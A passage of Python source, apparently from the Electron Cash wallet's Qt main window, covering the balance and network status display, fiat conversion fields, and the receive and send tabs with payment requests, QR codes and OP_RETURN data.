text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return format_fee_satoshis(fee_rate/1000, max(self.num_zeros, 1)) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
if self.decimal_point in util.inv_base_units:
return util.inv_base_units[self.decimal_point]
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else None
if rate is None or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / PyDecimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * PyDecimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
_network_status_tip_dict = dict()
def update_status(self):
if not self.wallet:
return
icon_dict = ElectrumWindow.status_icon_dict
if not icon_dict:
# cache the icons to save on CPU overhead per update_status call
icon_dict.update({
"status_disconnected" : QIcon(":icons/status_disconnected.svg"),
"status_waiting" : QIcon(":icons/status_waiting.svg"),
"status_lagging" : QIcon(":icons/status_lagging.svg"),
"status_lagging_fork" : QIcon(":icons/status_lagging_fork.svg"),
"status_connected" : QIcon(":icons/status_connected.svg"),
"status_connected_fork" : QIcon(":icons/status_connected_fork.svg"),
"status_connected_proxy" : QIcon(":icons/status_connected_proxy.svg"),
"status_connected_proxy_fork" : QIcon(":icons/status_connected_proxy_fork.svg"),
})
status_tip_dict = ElectrumWindow._network_status_tip_dict
if not status_tip_dict:
# Since we're caching stuff, might as well cache this too
status_tip_dict.update({
"status_disconnected" : _('Network Status') + " - " + _("Offline"),
"status_waiting" : _('Network Status') + " - " + _("Updating..."),
"status_lagging" : _('Network Status') + " - " + '',
"status_lagging_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected" : _('Network Status') + " - " + _("Connected"),
"status_connected_fork" : _('Network Status') + " - " + _("Chain fork(s) detected"),
"status_connected_proxy" : _('Network Status') + " - " + _("Connected via proxy"),
"status_connected_proxy_fork" : _('Network Status') + " - " + _("Connected via proxy") + "; " + _("Chain fork(s) detected"),
})
status_tip = ''
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict['status_disconnected']
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
num_chains = len(self.network.get_blockchains())
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = icon_dict["status_waiting"]
status_tip = status_tip_dict["status_waiting"]
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
if num_chains <= 1:
icon = icon_dict["status_lagging"]
status_tip = status_tip_dict["status_lagging"] + text
else:
icon = icon_dict["status_lagging_fork"]
status_tip = status_tip_dict["status_lagging_fork"] + "; " + text
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
extra = run_hook("balance_label_extra", self)
if isinstance(extra, str) and extra:
text += " [{}]".format(extra)
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
n_unverif = self.wallet.get_unverified_tx_pending_count()
if n_unverif >= 10:
# if there are lots left to verify, display this informative text
text += " " + ( _("[%d unverified TXs]") % n_unverif )
if not self.network.proxy:
icon = icon_dict["status_connected"] if num_chains <= 1 else icon_dict["status_connected_fork"]
status_tip = status_tip_dict["status_connected"] if num_chains <= 1 else status_tip_dict["status_connected_fork"]
else:
icon = icon_dict["status_connected_proxy"] if num_chains <= 1 else icon_dict["status_connected_proxy_fork"]
status_tip = status_tip_dict["status_connected_proxy"] if num_chains <= 1 else status_tip_dict["status_connected_proxy_fork"]
else:
text = _("Not connected")
icon = icon_dict["status_disconnected"]
status_tip = status_tip_dict["status_disconnected"]
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
self.status_button.setStatusTip( status_tip )
self.update_cashshuffle_icon()
def update_wallet(self):
self.need_update.set() # will enqueue an _update_wallet() call in at most 0.5 seconds from now.
def _update_wallet(self):
''' Called by self.timer_actions every 0.5 secs if need_update flag is set.
Note that the flag is actually cleared by update_tabs.'''
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
@rate_limited(1.0, classlevel=True, ts_after=True) # Limit tab updates to no more than 1 per second, app-wide. Multiple calls across instances will be collated into 1 deferred series of calls (1 call per extant instance)
def update_tabs(self):
if self.cleaned_up: return
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history, also clears self.tx_update_mgr.verif_q
self.need_update.clear() # clear flag
if self.labels_need_update.is_set():
# if flag was set, might as well declare the labels updated since they necessarily were due to a full update.
self.labels_updated_signal.emit() # just in case client code was waiting for this signal to proceed.
self.labels_need_update.clear() # clear flag
def update_labels(self):
self.labels_need_update.set() # will enqueue an _update_labels() call in at most 0.5 seconds from now
@rate_limited(1.0)
def _update_labels(self):
''' Called by self.timer_actions every 0.5 secs if labels_need_update flag is set. '''
if self.cleaned_up: return
self.history_list.update_labels()
self.address_list.update_labels()
self.utxo_list.update_labels()
self.update_completions()
self.labels_updated_signal.emit()
self.labels_need_update.clear() # clear flag
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
return l
def show_address(self, addr, *, parent=None):
parent = parent or self
from . import address_dialog
d = address_dialog.AddressDialog(self, addr, windowParent=parent)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
d = show_transaction(tx, self, tx_desc)
self._tx_dialogs.add(d)
def on_toggled_opreturn(self, b):
''' toggles opreturn-related widgets for both the receive and send
tabs'''
b = bool(b)
self.config.set_key('enable_opreturn', b)
# send tab
if not b:
self.message_opreturn_e.setText("")
self.op_return_toolong = False
for x in self.send_tab_opreturn_widgets:
x.setVisible(b)
# receive tab
for x in self.receive_tab_opreturn_widgets:
x.setVisible(b)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address = None
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton()
self.receive_address_e.setReadOnly(True)
msg = _('Bitcoin Cash address where the payment should be received. Note that each payment request uses a different Bitcoin Cash address.')
label = HelpLabel(_('&Receiving address'), msg)
label.setBuddy(self.receive_address_e)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.gui_object.cashaddr_toggled_signal.connect(self.update_receive_address_widget)
grid.addWidget(label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
label = QLabel(_('&Description'))
label.setBuddy(self.receive_message_e)
grid.addWidget(label, 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
# OP_RETURN requests
self.receive_opreturn_e = QLineEdit()
msg = _("You may optionally append an OP_RETURN message to the payment URI and/or QR you generate.\n\nNote: Not all wallets yet support OP_RETURN parameters, so make sure the other party's wallet supports OP_RETURN URIs.")
self.receive_opreturn_label = label = HelpLabel(_('&OP_RETURN'), msg)
label.setBuddy(self.receive_opreturn_e)
self.receive_opreturn_rawhex_cb = QCheckBox(_('Raw &hex script'))
self.receive_opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
grid.addWidget(label, 2, 0)
grid.addWidget(self.receive_opreturn_e, 2, 1, 1, 3)
grid.addWidget(self.receive_opreturn_rawhex_cb, 2, 4, Qt.AlignLeft)
self.receive_opreturn_e.textChanged.connect(self.update_receive_qr)
self.receive_opreturn_rawhex_cb.clicked.connect(self.update_receive_qr)
self.receive_tab_opreturn_widgets = [
self.receive_opreturn_e,
self.receive_opreturn_rawhex_cb,
self.receive_opreturn_label,
]
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
label = QLabel(_('Requested &amount'))
label.setBuddy(self.receive_amount_e)
grid.addWidget(label, 3, 0)
grid.addWidget(self.receive_amount_e, 3, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 3, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin Cash addresses.'),
_('The Bitcoin Cash address never expires and will always be part of this Electron Cash wallet.'),
])
label = HelpLabel(_('Request &expires'), msg)
label.setBuddy(self.expires_combo)
grid.addWidget(label, 4, 0)
grid.addWidget(self.expires_combo, 4, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.hide()
grid.addWidget(self.expires_label, 4, 1)
self.save_request_button = QPushButton(_('&Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('&Clear'))
self.new_request_button.clicked.connect(self.new_payment_request)
weakSelf = Weak.ref(self)
class MyQRCodeWidget(QRCodeWidget):
def mouseReleaseEvent(self, e):
''' to make the QRWidget clickable '''
weakSelf() and weakSelf().show_qr_window()
self.receive_qr = MyQRCodeWidget(fixedSize=200)
self.receive_qr.setCursor(QCursor(Qt.PointingHandCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
buttons.addStretch(1)
grid.addLayout(buttons, 5, 2, 1, -1)
self.receive_requests_label = QLabel(_('Re&quests'))
from .request_list import RequestList
self.request_list = RequestList(self)
self.request_list.chkVisible()
self.receive_requests_label.setBuddy(self.request_list)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
vbox2 = QVBoxLayout()
vbox2.setContentsMargins(0,0,0,0)
vbox2.setSpacing(4)
vbox2.addWidget(self.receive_qr, Qt.AlignHCenter|Qt.AlignTop)
self.receive_qr.setToolTip(_('Receive request QR code (click for details)'))
but = uribut = QPushButton(_('Copy &URI'))
def on_copy_uri():
if self.receive_qr.data:
uri = str(self.receive_qr.data)
self.copy_to_clipboard(uri, _('Receive request URI copied to clipboard'), uribut)
but.clicked.connect(on_copy_uri)
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
but.setToolTip(_('Click to copy the receive request URI to the clipboard'))
vbox2.addWidget(but)
vbox2.setAlignment(but, Qt.AlignHCenter|Qt.AlignVCenter)
hbox.addLayout(vbox2)
class ReceiveTab(QWidget):
def showEvent(self, e):
super().showEvent(e)
if e.isAccepted():
slf = weakSelf()
if slf:
slf.check_and_reset_receive_address_if_needed()
w = ReceiveTab()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.address_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr.to_storage_string(), '')
amount = req['amount']
op_return = req.get('op_return')
op_return_raw = req.get('op_return_raw') if not op_return else None
URI = web.create_URI(addr, amount, message, op_return=op_return, op_return_raw=op_return_raw)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
if not self.receive_address:
self.show_error(_('No receiving address'))
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
kwargs = {}
opr = self.receive_opreturn_e.text().strip()
if opr:
# save op_return, if any
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
kwargs[arg] = opr
req = self.wallet.make_payment_request(self.receive_address, amount,
message, expiration, **kwargs)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(self.receive_address)
self.request_list.update()
self.request_list.select_item_by_address(req.get('address')) # when adding items to the view the current selection may not reflect what's in the UI. Make sure it's selected.
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self.top_level_window(), title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests[addr]
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address(frozen_ok=False)
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
# New! Since the button is called 'Clear' now, we let them proceed with a re-used address
addr = self.wallet.get_receiving_address()
else:
# Warn if past gap limit.
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None) # We want the current item to always reflect what's in the UI. So if new, clear selection.
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address = addr
self.receive_message_e.setText('')
self.receive_opreturn_rawhex_cb.setChecked(False)
self.receive_opreturn_e.setText('')
self.receive_amount_e.setAmount(None)
self.update_receive_address_widget()
def update_receive_address_widget(self):
text = ''
if self.receive_address:
text = self.receive_address.to_full_ui_string()
self.receive_address_e.setText(text)
@rate_limited(0.250, ts_after=True) # this function potentially re-computes the QR widget, so it's rate limited to once every 250ms
def check_and_reset_receive_address_if_needed(self):
''' Check to make sure the receive tab is kosher and doesn't contain
an already-used address. This should be called from the showEvent
for the tab. '''
if not self.wallet.use_change or self.cleaned_up:
# if they don't care about change addresses, they are ok
# with re-using addresses, so skip this check.
return
# ok, they care about anonymity, so make sure the receive address
# is always an unused address.
if (not self.receive_address # this should always be defined but check anyway
or self.receive_address in self.wallet.frozen_addresses # make sure it's not frozen
or (self.wallet.get_address_history(self.receive_address) # make a new address if it has a history
and not self.wallet.get_payment_request(self.receive_address, self.config))): # and if they aren't actively editing one in the request_list widget
addr = self.wallet.get_unused_address(frozen_ok=False) # try unused, not frozen
if addr is None:
if self.wallet.is_deterministic():
# creae a new one if deterministic
addr = self.wallet.create_new_address(False)
else:
# otherwise give up and just re-use one.
addr = self.wallet.get_receiving_address()
self.receive_address = addr
self.update_receive_address_widget()
def clear_receive_tab(self):
self.expires_label.hide()
self.expires_combo.show()
self.request_list.setCurrentItem(None)
self.set_receive_address(self.wallet.get_receiving_address(frozen_ok=False))
def show_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window()
self.qr_window.setAttribute(Qt.WA_DeleteOnClose, True)
weakSelf = Weak.ref(self)
def destroyed_clean(x):
if weakSelf():
weakSelf().qr_window = None
weakSelf().print_error("QR Window destroyed.")
self.qr_window.destroyed.connect(destroyed_clean)
self.update_receive_qr()
if self.qr_window.isMinimized():
self.qr_window.showNormal()
else:
self.qr_window.show()
self.qr_window.raise_()
self.qr_window.activateWindow()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
self.receive_address = addr
self.show_receive_tab()
self.update_receive_address_widget()
def update_receive_qr(self):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
kwargs = {}
if self.receive_opreturn_e.isVisible():
# set op_return if enabled
arg = 'op_return'
if self.receive_opreturn_rawhex_cb.isChecked():
arg = 'op_return_raw'
opret = self.receive_opreturn_e.text()
if opret:
kwargs[arg] = opret
# Special case hack -- see #1473. Omit bitcoincash: prefix from
# legacy address if no other params present in receive request.
if Address.FMT_UI == Address.FMT_LEGACY and not kwargs and not amount and not message:
uri = self.receive_address.to_ui_string()
else:
# Otherwise proceed as normal, prepending bitcoincash: to URI
uri = web.create_URI(self.receive_address, amount, message, **kwargs)
self.receive_qr.setData(uri)
if self.qr_window:
self.qr_window.set_content(self, self.receive_address_e.text(), amount,
message, uri, **kwargs)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin Cash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin Cash address)') + ".\n\n" \
+ _('You may also enter cointext:(NUMBER) to send a CoinText.')
payto_label = HelpLabel(_('Pay &to'), msg)
payto_label.setBuddy(self.payto_e)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter(self.payto_e)
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('&Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
description_label.setBuddy(self.message_e)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg_opreturn = ( _('OP_RETURN data (optional).') + '\n\n'
+ _('Posts a PERMANENT note to the BCH blockchain as part of this transaction.')
+ '\n\n' + _('If you specify OP_RETURN text, you may leave the \'Pay to\' field blank.') )
self.opreturn_label = HelpLabel(_('&OP_RETURN'), msg_opreturn)
grid.addWidget(self.opreturn_label, 3, 0)
self.message_opreturn_e = MyLineEdit()
self.opreturn_label.setBuddy(self.message_opreturn_e)
hbox = QHBoxLayout()
hbox.addWidget(self.message_opreturn_e)
self.opreturn_rawhex_cb = QCheckBox(_('&Raw hex script'))
self.opreturn_rawhex_cb.setToolTip(_('If unchecked, the textbox contents are UTF8-encoded into a single-push script: <tt>OP_RETURN PUSH <text></tt>. If checked, the text contents will be interpreted as a raw hexadecimal script to be appended after the OP_RETURN opcode: <tt>OP_RETURN <script></tt>.'))
hbox.addWidget(self.opreturn_rawhex_cb)
grid.addLayout(hbox, 3 , 1, 1, -1)
self.send_tab_opreturn_widgets = [
self.message_opreturn_e,
self.opreturn_rawhex_cb,
self.opreturn_label,
]
self.from_label = QLabel(_('&From'))
grid.addWidget(self.from_label, 4, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_label.setBuddy(self.from_list)
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 4, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('&Amount'), msg)
amount_label.setBuddy(self.amount_e)
grid.addWidget(amount_label, 5, 0)
grid.addWidget(self.amount_e, 5, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 5, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("&Max"), self.spend_max)
self.max_button.setFixedWidth(140)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 5, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 5, 4)
msg = _('Bitcoin Cash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('F&ee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_e_label.setBuddy(self.fee_slider)
self.fee_slider.setFixedWidth(140)
self.fee_custom_lbl = HelpLabel(self.get_custom_fee_text(),
_('This is the fee rate that will be used for this transaction.')
+ "\n\n" + _('It is calculated from the Custom Fee Rate in preferences, but can be overridden from the manual fee edit on this form (if enabled).')
+ "\n\n" + _('Generally, a fee of 1.0 sats/B is a good minimal rate to ensure your transaction will make it into the next block.'))
self.fee_custom_lbl.setFixedWidth(140)
self.fee_slider_mogrifier()
self.fee_e = BTCAmountEdit(self.get_decimal_point)
if not self.config.get('show_fee', False):
self.fee_e.setVisible(False)
self.fee_e.textEdited.connect(self.update_fee)
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
self.fee_e.editingFinished.connect(self.update_fee)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
grid.addWidget(self.fee_e_label, 6, 0)
grid.addWidget(self.fee_slider, 6, 1)
grid.addWidget(self.fee_custom_lbl, 6, 1)
grid.addWidget(self.fee_e, 6, 2)
self.preview_button = EnterButton(_("&Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transactions before signing it.'))
self.send_button = EnterButton(_("&Send"), self.do_send)
self.cointext_button = EnterButton(_("Coin&Text"), self.do_cointext)
self.cointext_button.setToolTip(_('Process CoinText, transforming it into a BIP70 payment request.'))
self.clear_button = EnterButton(_("&Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
buttons.addWidget(self.cointext_button)
grid.addLayout(buttons, 7, 1, 1, 3)
self.payto_e.textChanged.connect(self.update_buttons_on_seed) # hide/unhide cointext button, etc
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textEdited.connect(self.update_fee)
self.message_opreturn_e.textChanged.connect(self.update_fee)
self.message_opreturn_e.editingFinished.connect(self.update_fee)
self.opreturn_rawhex_cb.stateChanged.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enabled = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enabled)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
extra = run_hook("not_enough_funds_extra", self)
if isinstance(extra, str) and extra:
text += " ({})".format(extra)
elif self.fee_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT
elif self.amount_e.isModified():
amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE
else:
amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE
opret_color = ColorScheme.DEFAULT
if self.op_return_toolong:
opret_color = ColorScheme.RED
text = _("OP_RETURN message too large, needs to be no longer than 220 bytes") + (", " if text else "") + text
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.message_opreturn_e.setStyleSheet(opret_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textChanged.connect(entry_changed)
self.message_opreturn_e.textEdited.connect(entry_changed)
self.message_opreturn_e.editingFinished.connect(entry_changed)
self.opreturn_rawhex_cb.stateChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
self.invoice_list.chkVisible()
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def get_custom_fee_text(self, fee_rate = None):
if not self.config.has_custom_fee_rate():
return ""
else:
if fee_rate is None: fee_rate = self.config.custom_fee_rate() / 1000.0
return str(round(fee_rate*100)/100) + " sats/B"
@staticmethod
def output_for_opreturn_stringdata(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturnTooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
@staticmethod
def output_for_opreturn_rawhex(op_return):
if not isinstance(op_return, str):
raise OPReturnError('OP_RETURN parameter needs to be of type str!')
if op_return == 'empty':
op_return = ''
try:
op_return_script = b'\x6a' + bytes.fromhex(op_return.strip())
except ValueError:
raise OPReturnError(_('OP_RETURN script expected to be hexadecimal bytes'))
if len(op_return_script) > 223:
raise OPReturnTooLarge(_("OP_RETURN script too large, needs to be no longer than 223 bytes"))
amount = 0
return (TYPE_SCRIPT, ScriptOutput(op_return_script), amount)
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
fee_rate = None
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
if not outputs:
_type, addr = self.get_payto_or_dummy()
